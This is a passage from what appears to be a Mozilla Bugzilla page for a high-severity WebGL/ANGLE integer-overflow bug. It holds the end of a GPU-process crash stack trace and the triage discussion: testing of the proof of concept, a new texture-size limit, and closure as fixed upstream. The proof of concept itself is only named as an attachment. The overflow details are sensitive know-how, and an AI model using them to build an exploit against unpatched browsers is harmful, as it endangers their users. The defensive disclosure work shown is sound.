55 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,6,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int),&mozilla::HostWebGLContext::CreateShader>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
56 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,5,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateSampler>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
57 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,4,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateRenderbuffer>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
58 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,3,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateQuery>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
59 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,2,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateProgram>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
5a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,1,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateFramebuffer>::DispatchCommand+0x128c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
5b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher<WebGLMethodDispatcher,0,void (mozilla::HostWebGLContext::*)(unsigned long long),&mozilla::HostWebGLContext::CreateBuffer>::DispatchCommand+0x129c [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 253] 
5c 00000091`1c70edc0 00007fff`cea60994 xul!mozilla::dom::WebGLParent::RecvDispatchCommands+0x13d8 [/builds/worker/checkouts/gecko/dom/canvas/WebGLParent.cpp @ 60] 
5d 00000091`1c70f060 00007fff`cc8baec5 xul!mozilla::dom::PWebGLParent::OnMessageReceived+0x144 [/builds/worker/workspace/obj-build/ipc/ipdl/PWebGLParent.cpp @ 200] 
5e 00000091`1c70f130 00007fff`cdfd81b3 xul!mozilla::layers::PCompositorManagerParent::OnMessageReceived+0x65 [/builds/worker/workspace/obj-build/ipc/ipdl/PCompositorManagerParent.cpp @ 200] 
5f (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::DispatchAsyncMessage+0x73 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 2039] 
60 00000091`1c70f230 00007fff`cdd44a45 xul!mozilla::ipc::MessageChannel::DispatchMessage+0x403 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1964] 
61 (Inline Function) --------`-------- xul!mozilla::ipc::MessageChannel::RunMessage+0xe3 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1823] 
62 00000091`1c70f5c0 00007fff`cdc68a8c xul!mozilla::ipc::MessageChannel::MessageTask::Run+0x165 [/builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp @ 1853] 
63 00000091`1c70f650 00007fff`cdc66bd2 xul!nsThread::ProcessNextEvent+0x1b1c [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1143] 
64 (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x26 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 466] 
65 00000091`1c70f9f0 00007fff`ccf56f9f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xf2 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300] 
66 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 331] 
67 00000091`1c70fa90 00007fff`cc64823e xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 325] 
68 00000091`1c70fae0 00007fff`cce16337 xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 307] 
69 00000091`1c70fb40 00007ff8`3dba619d xul!nsThread::ThreadFunc+0xe7 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 392] 
6a 00000091`1c70fd00 00007ff8`3dbbda41 nss3!_PR_NativeRunThread+0x13d [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
6b 00000091`1c70fd70 00007ff8`72eb1bb2 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
6c 00000091`1c70fda0 00007ff8`73ac7034 ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
6d 00000091`1c70fdd0 00007ff8`40495008 KERNEL32!BaseThreadInitThunk+0x14
6e (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
6f 00000091`1c70fe00 00007ff8`75362651 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 588] 
70 00000091`1c70fe70 00000000`00000000 ntdll!RtlUserThreadStart+0x21

Looben Yang

Reporter

Comment 1

•

4 years ago

Attached file BOF_Initialize4ComponentData_ASAN.txt — Details

Daniel Veditz [:dveditz] back January 5, 2026

Updated

•

4 years ago

Group: firefox-core-security → gfx-core-security

Component: General → Canvas: WebGL

Flags: sec-bounty?

Product: Firefox → Core

Daniel Veditz [:dveditz] back January 5, 2026

Updated

•

4 years ago

Flags: needinfo?(jgilbert)

Keywords: csectype-intoverflow, sec-high

Daniel Veditz [:dveditz] back January 5, 2026

Updated

•

4 years ago

status-firefox93: --- → ?

status-firefox-esr78: --- → ?

status-firefox-esr91: --- → ?

Kelsey Gilbert [:jgilbert]

Comment 2

•

4 years ago

Yes, it looks like this did crash the gpu process for me.

Assignee: nobody → jgilbert

Severity: -- → S3

Flags: needinfo?(jgilbert)

Priority: -- → P1

Ryan VanderMeulen [:RyanVM]

Updated

•

4 years ago

status-firefox94: affected → wontfix

status-firefox95: --- → affected

BugBot [:suhaib / :marco/ :calixte]

Comment 3

•

3 years ago

The severity field for this bug is set to S3. However, the bug is flagged with the sec-high keyword.
:jgilbert, could you consider increasing the severity of this security bug?

For more information, please visit auto_nag documentation.

Flags: needinfo?(jgilbert)

Kelsey Gilbert [:jgilbert]

Comment 4

•

3 years ago

S3 P1 is right for this.

Flags: needinfo?(jgilbert)

Ryan VanderMeulen [:RyanVM]

Updated

•

3 years ago

status-firefox93: ? → wontfix

status-firefox95: affected → wontfix

status-firefox-esr78: ? → wontfix

Jeff Muizelaar [:jrmuizel]

Updated

•

3 years ago

Assignee: jgilbert → ahale

Ashley Hale [:ahale]

Assignee

Comment 5

•

3 years ago

I'm trying to determine if this bug is already fixed, because our ANGLE uses CheckedSize in the relevant code in GenerateInitialTextureData https://searchfox.org/mozilla-central/rev/d01591796d5faccf762adb09a311d8ee12f7ca7f/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/renderer11_utils.cpp#2193 which doesn't appear to match the PoC citing code that looks nearly identical but uses unsigned int.

In testing the PoC I get WebGL context loss on a Windows amd64 build of Firefox, but afaict that's just due to asking for a bigger 3D texture than my GPU wants to deal with, not due to any math issues.

Do we want to enforce limits on 3D textures at a higher level such as the entry points ( https://searchfox.org/mozilla-central/rev/d01591796d5faccf762adb09a311d8ee12f7ca7f/dom/canvas/ClientWebGLContext.cpp#3999 for example) or host layer ( https://searchfox.org/mozilla-central/rev/d01591796d5faccf762adb09a311d8ee12f7ca7f/dom/canvas/HostWebGLContext.h#571 ), or let it reach ANGLE which appears to be correctly using CheckedSize math to prevent it from overflowing in Initialize4ComponentData? And do we want to impose a 31bit limit in a 64bit browser?

Flags: needinfo?(jgilbert)

Ashley Hale [:ahale]

Assignee

Comment 6

•

3 years ago

•

Edited

I've tested an i686 build of Firefox for Windows as well as amd64 and in both cases there does not appear to be an exploitable outcome with the PoC currently. The i686 build stops short of calling Initialize4ComponentData because maxImageSize.IsValid() is false in i686 which causes ANGLE to produce a GL error and the WebGL process exits on a NULL dereference crash. Whereas in amd64 build the maxImageSize is valid and Initialize4ComponentData seems to work correctly, but the D3D11 driver (at least on my Intel GPU) returns an error which ANGLE turns into a GL error and the context is lost, leading to WebGL process exiting for different reasons.

Ashley Hale [:ahale]

Assignee

Comment 7

•

3 years ago

Discussed a little with :jrmuizel and one key question to answer is whether we should even try pushing a texture this large to the driver, regardless of whether it could theoretically work on a 64bit GPU (some users definitely have GPUs capable of this texture size, but whether WebGL should support textures of this size is more of a spec question I think?).

Ashley Hale [:ahale]

Assignee

Comment 8

•

3 years ago

•

Edited

Decision from discussion with :jgilbert is that we should impose a 1024MiB limit on maxImageSize using a pref (specified in mebibytes because prefs are 32bit) and return GL_OUT_OF_MEMORY and a detailed error message so that web developers see why we rejected the texture size and mention the pref they can change; if this becomes a common issue we expect that web developers will file bugs to get the default value of the pref changed.

The purpose of imposing a limit is defense in depth - we don't entirely trust GPU drivers to do this math correctly, and while some drivers definitely do this math correctly (especially for medical imaging visualization GPUs), we haven't confirmed which drivers can safely handle >2GiB textures.

Flags: needinfo?(jgilbert)

Ashley Hale [:ahale]

Assignee

Updated

•

3 years ago

Depends on: angle-94

Ashley Hale [:ahale]

Assignee

Updated

•

3 years ago

Comment 7 is private: false

Ashley Hale [:ahale]

Assignee

Comment 9

•

3 years ago

Per further discussion, closing this bug as the vulnerability in ANGLE was fixed in bug #1717151 by landing an updated ANGLE a few days after this bug was filed, the PoC doesn't seem to work according to my debugging efforts with current code. Please re-open if you disagree.

Status: NEW → RESOLVED

Closed: 3 years ago

Flags: needinfo?(loobenyang)

Resolution: --- → FIXED

Ryan VanderMeulen [:RyanVM]

Updated

•

3 years ago

status-firefox94: wontfix → fixed

status-firefox95: wontfix → ---

status-firefox-esr91: ? → wontfix

Target Milestone: --- → 94 Branch

Daniel Veditz [:dveditz] back January 5, 2026

Comment 10

•

3 years ago

The fix for this bug was already in the process of being merged when this bug was filed, and the library update finally landed just a couple of days later. This is (weakly) a duplicate of that upgrade for bug bounty purposes.

Flags: sec-bounty? → sec-bounty-

Daniel Veditz [:dveditz] back January 5, 2026

Comment 11

•

3 years ago

This appears to have been fixed upstream in https://bugs.chromium.org/p/chromium/issues/detail?id=1241036#c19 which patches exactly the overflow mentioned in comment 0.

Upstream patch: https://chromium.googlesource.com/angle/angle/+/794b13ce9f874d472729ebd69897bc7ab9340a4b%5E%21/#F0

Group: gfx-core-security

Flags: needinfo?(loobenyang)

See Also: → https://bugs.chromium.org/p/chromium/issues/detail?id=1241036

Ashley Hale [:ahale]

Assignee

Updated

•

3 years ago

Blocks: 1789729

David Lawrence [:dkl]

Updated

•

1 year ago

Keywords: reporter-external

BOF_Initialize4ComponentData_PoC.html 4 years ago Looben Yang 247 bytes, text/html		Details
BOF_Initialize4ComponentData_ASAN.txt 4 years ago Looben Yang 13.04 KB, text/plain		Details